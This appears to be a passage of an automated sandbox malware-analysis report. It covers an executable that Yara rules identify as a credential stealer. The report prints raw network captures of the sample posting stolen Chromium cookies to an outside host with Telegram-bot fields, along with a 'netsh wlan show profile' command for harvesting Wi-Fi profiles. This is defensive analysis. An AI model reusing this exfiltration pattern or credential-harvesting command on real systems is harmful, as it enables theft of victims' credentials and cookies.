                    2024-06-24 14:50:50 UTC750INData Raw: 31 63 36 65 0d 0a 48 34 73 49 41 41 41 41 41 41 41 41 41 38 78 64 42 33 77 55 78 66 66 66 35 43 36 58 35 46 49 76 46 39 4a 44 73 69 44 68 43 4c 30 6e 6f 66 63 75 48 51 4a 49 4a 33 51 34 53 4f 67 6c 42 4b 53 70 46 4f 6b 4b 30 67 57 6b 43 45 67 54 45 42 46 55 78 41 59 6f 56 71 51 4a 64 68 51 55 65 34 58 2f 76 4c 6e 62 33 62 6d 64 33 62 33 64 75 66 73 64 66 7a 2f 79 7a 64 33 63 7a 74 73 33 62 39 36 38 71 65 39 4e 68 39 35 50 63 69 61 4f 34 38 7a 6f 33 2f 33 37 48 48 65 55 63 2f 33 58 6d 50 50 2b 58 77 6e 36 46 35 31 78 50 4a 6f 37 46 48 36 4f 50 78 72 55 2f 68 7a 66 62 66 69 49 6f 73 78 78 68 63 35 68 68 51 50 48 5a 41 34 65 4f 48 61 73 63 30 4c 6d 6f 49 4c 4d 77 6f 6c 6a 4d 30 65 4d 7a 57 7a 65 73 57 76 6d 47 4f 65 51 67 69 70 52 55 64 61 48 33 44 51 36 74
                    Data Ascii: 1c6eH4sIAAAAAAAAA8xdB3wUxfff5C6X5FIvF9JDsiDhCL0nofcuHQJIJ3Q4SOglBKSpFOkK0gWkCEgTEBFUxAYoVqQJdhQUe4X/vLnb3bmd3b3dufsdfz/yzd3czts3b968qe9Nh95PciaO48zo3/37HHeUc/3XmPP+Xwn6F51xPJo7FH6OPxrU/hzfbfiIosxxhc5hhQPHZA4eOHasc0LmoILMwoljM0eMzWzesWvmGOeQgipRUdaH3DQ6t
                    2024-06-24 14:50:50 UTC1369INData Raw: 47 6e 47 33 44 38 58 4b 70 41 54 33 72 79 50 66 72 64 6d 46 2b 72 57 48 6d 39 45 45 47 5a 4f 6c 7a 49 6a 4a 53 47 41 79 32 76 52 2b 64 6f 38 45 70 61 63 6d 38 58 30 79 61 38 2b 55 53 48 72 2b 57 6a 70 34 65 67 7a 6b 4c 78 4e 73 6d 68 6e 6a 4b 75 33 30 57 43 45 68 31 70 31 67 45 78 4a 73 37 6f 51 34 49 51 46 2f 47 45 72 49 4c 39 36 54 37 77 53 6c 31 45 6e 38 4f 7a 74 47 35 30 6f 63 65 66 37 36 73 4d 6b 63 50 44 30 42 30 58 55 30 44 30 47 53 54 49 65 30 4a 61 62 67 36 59 6b 6f 71 62 42 73 46 6a 66 4f 37 45 42 35 72 63 48 54 6b 7a 79 66 6d 63 2f 50 37 62 6d 33 6a 45 53 56 72 74 52 4a 76 50 6e 56 52 6f 50 55 33 75 75 68 56 4f 2b 33 6e 6c 47 67 57 67 75 79 66 48 7a 75 6c 59 54 6d 57 75 38 64 6d 71 44 32 53 78 64 50 2b 52 53 58 42 58 48 4b 4b 37 73 45 70 30 37
                    Data Ascii: GnG3D8XKpAT3ryPfrdmF+rWHm9EEGZOlzIjJSGAy2vR+do8Epacm8X0ya8+USHr+Wjp4egzkLxNsmhnjKu30WCEh1p1gExJs7oQ4IQF/GErIL96T7wSl1En8OztG50ocef76sMkcPD0B0XU0D0GSTIe0Jabg6YkoqbBsFjfO7EB5rcHTkzyfmc/P7bm3jESVrtRJvPnVRoPU3uuhVO+3nlGgWguyfHzulYTmWu8dmqD2SxdP+RSXBXHKK7sEp07
                    2024-06-24 14:50:50 UTC1369INData Raw: 32 65 4e 76 4e 6c 53 2b 6c 72 38 47 32 4b 6b 35 42 31 33 58 2f 53 75 30 42 65 39 36 30 34 34 4a 79 53 63 63 79 65 63 46 78 4c 4f 75 78 4d 75 43 41 6b 58 33 41 6e 76 43 51 6e 76 75 63 66 55 66 38 57 6a 41 54 54 36 34 58 33 68 68 2f 66 64 54 31 34 55 45 69 36 36 45 7a 34 51 45 76 43 48 49 38 45 6d 78 78 6f 51 41 70 63 35 34 42 59 71 56 6e 35 43 4c 2b 63 30 2b 44 35 68 44 78 72 33 45 49 6c 50 42 65 48 78 72 61 4d 33 6c 44 63 76 32 50 45 30 2b 6f 36 49 66 41 68 45 61 67 52 50 68 37 2f 4f 74 66 43 4d 38 47 55 64 2b 65 55 5a 38 73 74 71 6a 76 69 79 48 6e 36 70 34 2f 70 69 63 6d 34 67 6e 39 75 49 71 38 50 39 6b 7a 6e 45 75 63 62 31 61 76 64 33 35 79 61 50 6e 4a 74 6c 44 32 2b 42 37 79 33 64 33 78 4e 4d 53 30 61 34 55 67 71 46 74 74 68 34 54 39 49 6a 52 41 31 39
                    Data Ascii: 2eNvNlS+lr8G2Kk5B13X/Su0Be96044JySccyecFxLOuxMuCAkX3AnvCQnvucfUf8WjATT64X3hh/fdT14UEi66Ez4QEvCHI8EmxxoQApc54BYqVn5CL+c0+D5hDxr3EIlPBeHxraM3lDcv2PE0+o6IfAhEagRPh7/OtfCM8GUd+eUZ8stqjviyHn6p4/picm4gn9uIq8P9kznEucb1avd35yaPnJtlD2+B7y3d3xNMS0a4UgqFtth4T9IjRA19
                    2024-06-24 14:50:50 UTC1369INData Raw: 67 47 53 48 45 2f 4b 38 2b 46 31 2b 69 63 53 50 7a 57 4b 4d 79 35 6d 30 51 59 50 4a 54 47 75 64 62 77 4c 49 37 53 41 42 6b 41 6d 51 6f 6b 30 41 2f 57 30 48 42 6e 4a 75 77 58 75 4c 4b 48 77 77 4d 38 51 42 6d 41 73 67 41 50 41 5a 52 54 34 63 43 42 42 73 34 57 6b 67 45 72 50 4a 4d 46 55 42 37 41 41 56 41 42 49 46 73 58 41 78 48 77 51 45 57 41 53 67 43 56 41 61 6f 41 56 4e 58 4c 51 43 51 38 55 77 32 67 4f 6b 41 4e 67 4a 6f 41 74 58 51 78 45 41 55 50 31 41 61 6f 41 31 41 58 49 41 63 67 56 79 38 44 30 66 42 4d 48 6b 41 39 67 50 6f 41 44 51 41 61 36 6d 49 67 42 68 35 6f 42 4e 41 59 6f 41 6c 41 55 34 42 6d 65 68 6d 49 68 57 65 61 41 37 51 41 61 41 6e 51 43 71 43 31 43 67 4e 32 73 38 30 4d 74 57 37 4e 58 51 51 74 78 4a 79 63 6d 46 78 55 42 74 4a 44 50 44 69 7a 51
                    Data Ascii: gGSHE/K8+F1+icSPzWKMy5m0QYPJTGudbwLI7SABkAmQok0A/W0HBnJuwXuLKHwwM8QBmAsgAPAZRT4cCBBs4WkgErPJMFUB7AAVABIFsXAxHwQEWASgCVAaoAVNXLQCQ8Uw2gOkANgJoAtXQxEAUP1AaoA1AXIAcgVy8D0fBMHkA9gPoADQAa6mIgBh5oBNAYoAlAU4BmehmIhWeaA7QAaAnQCqC1CgN2s80MtW7NXQQtxJycmFxUBtJDPDizQ
                    2024-06-24 14:50:50 UTC1369INData Raw: 31 4e 6b 52 4c 6d 70 59 5a 4a 57 69 52 78 38 46 53 6c 64 45 56 72 56 42 6c 38 72 71 6e 61 34 79 68 44 66 47 33 77 2b 7a 45 6f 6c 6f 43 51 37 32 49 42 52 71 69 4a 58 53 71 72 75 6a 71 39 4b 55 4e 72 61 31 5a 6b 64 69 39 30 72 52 7a 74 4c 42 31 74 52 6a 56 70 6c 63 67 31 53 4e 56 32 54 36 31 49 54 51 69 35 55 49 39 79 30 6d 4f 2f 61 30 35 65 50 33 64 41 68 52 4e 6d 4b 49 56 7a 57 67 38 79 4d 46 4b 43 4a 66 5a 47 57 48 6d 50 67 36 57 50 44 41 4b 59 38 4d 4f 4e 50 30 45 6f 37 53 68 30 38 6e 63 6a 47 6c 76 4a 6d 6d 33 63 64 4f 57 74 52 33 64 64 47 63 43 33 55 63 78 33 55 64 4a 75 72 33 63 64 50 6b 50 4f 6e 78 4e 4c 47 6e 79 76 53 76 38 50 4a 57 6f 66 35 2f 66 30 38 54 39 48 6d 48 63 64 6d 52 41 70 38 48 47 36 57 63 4d 45 2b 6a 6c 65 73 72 44 6f 4a 77 7a 75 67
                    Data Ascii: 1NkRLmpYZJWiRx8FSldEVrVBl8rqna4yhDfG3w+zEoloCQ72IBRqiJXSqrujq9KUNra1Zkdi90rRztLB1tRjVplcg1SNV2T61ITQi5UI9y0mO/a05eP3dAhRNmKIVzWg8yMFKCJfZGWHmPg6WPDAKY8MONP0Eo7Sh08ncjGlvJmm3cdOWtR3ddGcC3Ucx3UdJur3cdPkPOnxNLGnyvSv8PJWof5/f08T9HmHcdmRAp8HG6WcME+jlesrDoJwzug
                    2024-06-24 14:50:50 UTC1060INData Raw: 65 39 65 78 7a 63 4b 77 7a 69 36 30 72 53 39 62 76 6b 59 73 4f 2f 6a 65 4c 34 6e 6a 6f 2b 4c 77 4f 34 54 48 48 74 38 39 66 36 6d 46 35 54 31 6a 51 45 64 58 34 50 65 73 34 4c 79 4d 6a 30 36 6e 6a 38 68 67 65 59 66 61 47 45 78 75 4a 37 64 4d 4f 63 64 41 50 79 4e 43 62 74 65 46 65 63 4c 49 6d 32 65 73 4c 50 7a 43 4f 52 63 4d 2b 52 68 46 32 63 2f 6c 56 4d 5a 7a 32 50 45 52 6b 30 6f 41 5a 61 73 49 70 32 63 71 41 56 53 47 55 32 78 77 30 44 4d 4a 76 53 72 5a 72 63 50 59 6c 7a 63 37 42 61 57 41 4b 73 4c 45 48 73 34 55 57 70 31 56 45 53 52 62 5a 66 79 6c 65 50 43 33 42 76 46 58 57 41 71 79 41 7a 39 50 4b 74 52 52 72 7a 64 50 31 2f 59 6f 73 34 73 33 2b 74 31 71 33 4f 61 36 75 57 58 6a 72 62 7a 41 32 79 4a 5a 33 62 37 7a 62 75 2f 53 43 6e 77 46 53 6d 62 56 42 62 36
                    Data Ascii: e9exzcKwzi60rS9bvkYsO/jeL4njo+LwO4THHt89f6mF5T1jQEdX4Pes4LyMj06nj8hgeYfaGExuJ7dMOcdAPyNCbteFecLIm2esLPzCORcM+RhF2c/lVMZz2PERk0oAZasIp2cqAVSGU2xw0DMJvSrZrcPYlzc7BaWAKsLEHs4UWp1VESRbZfylePC3BvFXWAqyAz9PKtRRrzdP1/Yos4s3+t1q3Oa6uWXjrbzA2yJZ3b7zbu/SCnwFSmbVBb6
                    2024-06-24 14:50:50 UTC1369INData Raw: 32 64 30 32 0d 0a 71 47 56 50 44 59 54 53 56 74 49 51 65 70 51 41 65 45 6e 43 71 6b 42 71 50 55 58 48 43 6d 54 58 4d 4c 46 36 63 47 77 62 50 77 43 64 71 2f 4d 4c 39 33 6f 4b 5a 72 53 5a 64 58 69 4f 66 61 7a 77 42 58 68 58 69 63 71 31 37 37 33 51 76 45 75 67 6e 74 68 30 41 66 64 68 59 58 41 68 37 6e 66 44 70 58 72 63 4e 2f 51 66 2b 35 36 6a 73 63 74 45 52 55 6e 6b 6c 6a 56 68 45 4f 71 42 34 2b 4f 58 45 35 72 2b 4d 79 78 58 6d 38 4a 77 34 6c 65 4c 49 43 4b 62 4a 46 45 6b 6a 79 4c 42 4f 6b 65 4d 6f 47 55 6a 78 4c 43 53 6d 6b 5a 4f 43 37 4b 4c 30 6e 58 4e 4b 44 4e 4c 77 49 67 74 38 57 62 59 2f 4e 73 4f 49 30 6f 75 6a 34 45 61 74 48 32 65 74 43 32 57 4f 7a 50 64 65 44 2b 4a 41 7a 31 32 71 72 6c 46 33 6a 62 4b 7a 33 30 38 77 4b 4b 30 62 30 73 70 4b 4f 4d 35 5a
                    Data Ascii: 2d02qGVPDYTSVtIQepQAeEnCqkBqPUXHCmTXMLF6cGwbPwCdq/ML93oKZrSZdXiOfazwBXhXicq1773QvEugnth0AfdhYXAh7nfDpXrcN/Qf+56jsctERUnkljVhEOqB4+OXE5r+MyxXm8Jw4leLICKbJFEkjyLBOkeMoGUjxLCSmkZOC7KL0nXNKDNLwIgt8WbY/NsOI0ouj4EatH2etC2WOzPdeD+JAz12qrlF3jbKz308wKK0b0spKOM5Z
                    2024-06-24 14:50:50 UTC1369INData Raw: 67 41 50 41 5a 52 54 49 50 69 63 44 6f 4b 37 49 55 73 57 5a 43 34 50 34 41 43 6f 41 4a 43 74 51 48 43 58 44 6f 4a 37 49 45 74 46 79 46 77 4a 6f 44 4a 41 46 59 43 71 43 67 52 33 36 79 44 34 50 47 53 70 42 70 6d 72 41 39 51 41 71 41 6c 51 53 34 48 67 48 67 32 43 37 71 42 6e 4d 41 61 42 42 55 30 38 6a 6d 79 58 76 34 2f 59 6e 7a 63 34 2f 79 78 43 30 78 46 78 59 36 45 32 63 4a 4d 50 30 41 75 67 4e 30 41 66 67 45 64 6f 4e 6c 33 52 38 5a 31 74 69 65 78 31 34 4b 6d 2b 41 50 30 41 2b 67 4d 4d 41 42 68 49 5a 33 66 6c 36 46 47 4b 63 38 56 78 63 37 59 44 49 49 6e 56 68 54 79 44 41 41 59 44 44 41 45 6f 41 42 69 71 52 71 79 74 4f 72 45 63 79 44 4d 4d 59 44 6a 41 43 49 43 52 41 4b 50 55 69 4f 57 6f 45 38 75 46 50 4b 4d 42 78 67 43 4d 42 58 41 43 6a 4e 4d 6c 70 54 78 34
                    Data Ascii: gAPAZRTIPicDoK7IUsWZC4P4ACoAJCtQHCXDoJ7IEtFyFwJoDJAFYCqCgR36yD4PGSpBpmrA9QAqAlQS4HgHg2C7qBnMAaBBU08jmyXv4/Ynzc4/yxC0xFxY6E2cJMP0AugN0AfgEdoNl3R8Z1tiex14Km+AP0A+gMMABhIZ3fl6FGKc8Vxc7YDIInVhTyDAAYDDAEoABiqRqytOrEcyDMMYDjACICRAKPUiOWoE8uFPKMBxgCMBXACjNMlpTx4
                    2024-06-24 14:50:50 UTC1369INData Raw: 41 50 55 41 61 67 4c 4d 42 44 43 76 51 36 49 63 69 74 68 57 5a 44 70 61 4e 63 42 77 47 68 74 57 54 44 32 54 2b 38 4f 65 52 53 59 36 76 38 36 46 35 47 6c 4d 64 73 61 76 32 2f 77 6e 6b 6d 45 2f 65 33 43 63 65 49 6c 5a 38 2f 69 38 77 70 67 74 78 68 4f 47 63 4b 79 43 37 2b 6e 71 56 78 4b 47 63 70 36 6f 77 34 4b 4f 6f 43 44 43 48 4c 61 73 32 49 6a 6b 51 50 78 52 49 50 32 63 4c 6f 68 32 7a 6f 49 57 41 32 32 66 33 4d 65 67 76 31 54 42 72 51 43 53 66 6f 76 45 73 2f 6b 32 47 46 68 36 4c 52 51 2b 43 53 61 79 6c 47 70 54 57 58 79 34 4e 4c 4c 4c 4b 4b 34 64 71 2b 65 35 59 6c 77 65 35 4d 35 55 72 67 52 79 4a 72 44 47 53 4e 49 65 68 62 54 54 54 39 57 50 52 51 47 73 46 6e 73 78 44 71 6d 58 53 67 59 79 58 6f 6f 42 64 54 64 43 4c 67 6f 51 6a 69 6f 56 79 61 55 45 59 6b 65
                    Data Ascii: APUAagLMBDCvQ6IcithWZDpaNcBwGhtWTD2T+8OeRSY6v86F5GlMdsav2/wnkmE/e3CceIlZ8/i8wpgtxhOGcKyC7+nqVxKGcp6ow4KOoCDCHLas2IjkQPxRIP2cLoh2zoIWA22f3Megv1TBrQCSfovEs/k2GFh6LRQ+CSaylGpTWXy4NLLLKK4dq+e5Ylwe5M5UrgRyJrDGSNIehbTTT9WPRQGsFnsxDqmXSgYyXooBdTdCLgoQjioVyaUEYke
                    2024-06-24 14:50:50 UTC1369INData Raw: 38 36 54 76 4b 64 65 39 48 68 4f 6a 53 39 4e 30 53 2b 65 38 52 72 48 46 70 67 66 63 77 50 57 77 65 58 67 62 71 36 42 42 48 33 52 50 45 44 2b 6e 36 52 78 68 5a 54 72 47 65 78 46 4c 31 31 46 6f 46 38 58 37 35 68 78 2f 58 52 63 52 32 4e 44 7a 79 4f 6e 47 46 5a 59 49 4f 2b 36 38 72 33 70 4c 47 61 44 70 66 71 2b 46 51 64 65 4c 44 58 46 76 30 49 36 78 77 34 41 77 52 79 31 4f 33 7a 77 64 64 4b 68 32 54 42 6a 6d 2f 47 76 31 6e 4c 79 31 42 4d 4b 77 42 71 66 58 6c 71 6e 30 63 33 61 50 52 76 5a 36 4f 48 6b 33 72 44 69 36 57 50 6b 34 2b 74 78 30 2f 5a 76 52 41 52 66 75 68 34 37 6f 66 50 57 73 2b 33 69 65 4c 43 73 6f 68 46 72 45 50 30 39 68 54 75 47 64 4d 61 56 32 53 74 68 75 50 53 48 5a 44 62 68 4e 30 33 48 66 69 7a 33 76 47 78 48 6b 62 62 37 33 61 53 36 6f 55 76 73
                    Data Ascii: 86TvKde9HhOjS9N0S+e8RrHFpgfcwPWweXgbq6BBH3RPED+n6RxhZTrGexFL11FoF8X75hx/XRcR2NDzyOnGFZYIO+68r3pLGaDpfq+FQdeLDXFv0I6xw4AwRy1O3zwddKh2TBjm/Gv1nLy1BMKwBqfXlqn0c3aPRvZ6OHk3rDi6WPk4+tx0/ZvRARfuh47ofPWs+3ieLCsohFrEP09hTuGdMaV2SthuPSHZDbhN03Hfiz3vGxHkbb73aS6oUvs


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.22 | 49167 | 188.114.97.3 | 443 | 2036 | C:\Users\user\Desktop\wssvZm9dNK.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2024-06-24 14:51:08 UTC | 202 | OUT | POST /API/FETCH/getcountry.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638548738767882883
                    Host: whatismyipaddressnow.co
                    Content-Length: 5169
                    Connection: Keep-Alive
                    2024-06-24 14:51:08 UTC1024OUTData Raw: 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 34 38 37 33 38 37 36 37 38 38 32 38 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 53 33 46 6f 52 43 39 42 53 58 63 78 64 57 70 73 5a 6e 6b 35 64 48 4d 33 59 6c 70 4b 51 54 30 39 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 34 38 37 33 38 37 36 37 38 38 32 38 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 58 52 4b 65 46 70 7a 59 54 55 72 54 31 68 71 63 32 51 34 59 30 78 55 5a 33 64 4c 5a 32 6c 70 63 44 4a 73 52 47 55 76 54 31 4e
                    Data Ascii: -----TelegramBotAPI_638548738767882883Content-Disposition: form-data; name="chat_id"S3FoRC9BSXcxdWpsZnk5dHM3YlpKQT09-----TelegramBotAPI_638548738767882883Content-Disposition: form-data; name="token"aXRKeFpzYTUrT1hqc2Q4Y0xUZ3dLZ2lpcDJsRGUvT1N
                    2024-06-24 14:51:08 UTC4101OUTData Raw: 00 7c 04 d9 58 8d 1b b2 c8 8e 02 00 00 d7 04 00 00 14 00 00 00 43 68 72 6f 6d 69 75 6d 2f 43 6f 6f 6b 69 65 73 2e 74 78 74 a5 53 cb 6e a3 48 14 5d 57 4b fd 25 23 7b aa a8 17 15 c9 8b 32 60 4c 30 6f 70 9c 6c 10 6f 1c db 10 bb 4d 08 fe fa f1 b4 7a 31 ab 44 9a 1c dd cd dd 5c 9d c7 3d f3 a6 ef 9b 63 35 2f fa 13 88 c3 c4 00 7f 83 95 dc 44 06 40 18 0b 01 29 c2 0a 83 42 c1 48 00 cd 73 23 c3 8d 81 6f b8 ba e5 9a 7f 09 a6 fc fc b1 f8 0c 3f 7f cc 3f 39 cf 21 82 1c 13 15 22 8a 09 03 91 a7 45 40 93 46 b4 96 8d 66 b4 8f 5d 89 dd da 79 95 93 73 93 c4 d1 8d ab b3 12 51 70 73 32 79 da 0e 96 34 b2 65 b3 97 7b 35 3b 2d 9b 2f 69 8c e3 f8 19 13 ac 52 8e 08 a1 f0 37 80 17 bf 00 7e 27 85 19 49 d5 fb a8 29 82 44 51 e1 bf 0b 21 4c 10 f8 2d dd 77 4f 29 15 90 71 c4 b8 8a 80 34 34
                    Data Ascii: |XChromium/Cookies.txtSnH]WK%#{2`L0oploMz1D\=c5/D@)BHs#o??9!"E@Ff]ysQps2y4e{5;-/iR7~'I)DQ!L-wO)q44
                    2024-06-24 14:51:08 UTC | 44 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 34 38 37 33 38 37 36 37 38 38 32 38 38 33 2d 2d 0d 0a
                    Data Ascii: -----TelegramBotAPI_638548738767882883--
                    2024-06-24 14:51:09 UTC | 572 | IN | HTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:51:09 GMT
                    Content-Type: application/json
                    Content-Length: 20
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8qy03G5UYMKSOKc3%2FpY68GhiWId0%2B0yBKgmjMo8jP4DNhn3ldz0SlPBzPbAORBuz7E3lYvzXTfJ8fukbfZ6HKsmhJ0kLlc6nSs7cv8t33TR6%2FUKlIfmC8REArm4lkD0rNSNQIQFpSCvNjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 898d88c4fbb55e60-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-06-24 14:51:09 UTC | 20 | IN | Data Raw: 43 6f 75 6e 74 72 79 20 6e 6f 74 20 64 65 66 69 6e 65 64 2e
                    Data Ascii: Country not defined.


                    Target ID: 0
                    Start time: 10:50:45
                    Start date: 24/06/2024
                    Path: C:\Users\user\Desktop\wssvZm9dNK.exe
                    Wow64 process (32bit): true
                    Commandline: "C:\Users\user\Desktop\wssvZm9dNK.exe"
                    Imagebase: 0x230000
                    File size: 57'856 bytes
                    MD5 hash: 2C5697F085B66BEC06E28ED6D24EC606
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation: low
                    Has exited: true

                    Target ID: 2
                    Start time: 10:50:53
                    Start date: 24/06/2024
                    Path: C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit): true
                    Commandline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Imagebase: 0x49f10000
                    File size: 302'592 bytes
                    MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high
                    Has exited: true

                    Target ID: 4
                    Start time: 10:50:54
                    Start date: 24/06/2024
                    Path: C:\Windows\SysWOW64\chcp.com
                    Wow64 process (32bit): true
                    Commandline: chcp 65001
                    Imagebase: 0x340000
                    File size: 11'776 bytes
                    MD5 hash: 4436B1A16BDC58D2B3A5263F042C09B3
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: moderate
                    Has exited: true

                    Target ID: 5
                    Start time: 10:50:54
                    Start date: 24/06/2024
                    Path: C:\Windows\SysWOW64\netsh.exe
                    Wow64 process (32bit): true
                    Commandline: netsh wlan show profile
                    Imagebase: 0x1490000
                    File size: 96'256 bytes
                    MD5 hash: 784A50A6A09C25F011C3143DDD68E729
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: moderate
                    Has exited: true

                    Target ID: 6
                    Start time: 10:50:54
                    Start date: 24/06/2024
                    Path: C:\Windows\SysWOW64\findstr.exe
                    Wow64 process (32bit): true
                    Commandline: findstr All
                    Imagebase: 0x580000
                    File size: 62'976 bytes
                    MD5 hash: 18F02C555FBC9885DF9DB77754D6BB9B
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: moderate
                    Has exited: true

                    Target ID: 7
                    Start time: 10:50:56
                    Start date: 24/06/2024
                    Path: C:\Windows\System32\msiexec.exe
                    Wow64 process (32bit): false
                    Commandline: C:\Windows\system32\msiexec.exe /V
                    Imagebase: 0xff1c0000
                    File size: 128'512 bytes
                    MD5 hash: AC2E7152124CEED36846BD1B6592A00F
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: moderate
                    Has exited: false

                    No disassembly